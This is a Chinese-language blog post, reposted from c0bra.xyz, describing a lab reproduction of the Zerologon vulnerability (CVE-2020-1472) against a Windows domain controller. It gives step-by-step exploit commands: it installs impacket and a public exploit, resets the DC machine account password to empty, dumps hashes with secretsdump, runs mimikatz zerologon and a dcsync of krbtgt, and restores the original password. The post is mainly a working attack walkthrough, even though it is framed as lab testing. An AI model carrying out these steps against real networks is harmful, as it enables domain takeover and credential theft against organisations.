CVE-2020-1472 - gakkkkkkiii
2021-03-19 11:43:36 Author: www.c0bra.xyz(查看原文) 阅读量:143 收藏

介绍

CVE-2020-1472,懂的都懂,不懂的,说了你也不明白,不如不说。你们也别来问我怎么了,利益牵扯太大,说了对你们也没什么好处,当不知道就行了,其余的我只能说这里面水很深,牵扯到很多大人物,详细资料你们自己找是很难的,网上大部分都被删干净了,所以我只能说懂的都懂,不懂的也没办法。

环境

DC:10.10.10.10  //2012
PC:10.10.10.201 //win7
attack:10.10.10.15 //kali

一开始是打算通过PC用s5代理去打后来发现有点问题,代理总是通不了,最后直接加了个HostOnly的网卡直接打。

准备工作

先准备最新版的impacket。

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket && python3 -m pip install . 

下载exp。

git clone https://github.com/VoidSec/CVE-2020-1472
cd CVE-2020-1472 && python3 -m pip install -r requirements.txt

复现

重置密码为空

首先开机,检测步骤直接略了,反正我知道他有这个,这个exp里也没带检测脚本,直接打就行。

python3 cve-2020-1472-exploit.py -n DC -t 10.10.10.10

200927_1
看到已经成功重置,尝试空密码登录读取下hash。
使用impacket/example下的secretsdump.py。

200927_2
可以看到已经被重置为空密码。

DC$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

恢复密码

先尝试的是使用secretsdump.py,结果好像不行。

python3 secretsdump.py de1ay/DC\[email protected] --hashes xxxxxxxxxxxxxx:xxxxxxxxxxx

200927_3
直接使用了exp中自带的恢复脚本。

python3 reinstall_original_pw.py DC 10.10.10.10 xxxxxxxxxxxxxx:xxxxxxxxxxx

200927_4

mimikatz复现

mimikatz中也加入了CVE-2020-1472,拿来尝试下发现有几个需要注意的点。
项目地址:https://github.com/gentilkiwi/mimikatz
检测是否存在漏洞:

.\mimikatz.exe "privilege::debug" "lsadump::zerologon /target:10.10.10.10 /account:DC$"

200927_5
然后开始利用:

.\mimikatz.exe "privilege::debug" "lsadump::zerologon /target:10.10.10.10 /account:DC$ /exploit"

200927_6
然后问题来了,后面的读hash操作是失败的。
200927_7
同样的重置自然也就不行了。
原因应当是”privilege::debug”执行失败,这里就有一个坑了,我没填,如果是到域内机器上执行mimikatz进行利用,那只有一个普通域成员权限是不够的,需要域管权限才能执行(这时候我还需要利用这个打域控么?)。
200927_8
为了测试,我用管理权限启动了mimikatz,再进行执行,发现一切都正常了,只是我的脑子不正常了。

lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm

200927_9
再重置密码也就成功了。
200927_10

结尾

关于mimikatz的测试,我只测试了域成员本地的情况,因为我这代理的问题,没有测试本机通过代理直接去打的情况,有闲工夫的师傅们可以尝试下,挂代理用mimikatz打能否成功,望告知小弟结果。



文章来源: https://www.c0bra.xyz/2020/09/27/CVE-2020-1472/
如有侵权请联系:admin#unsafe.sh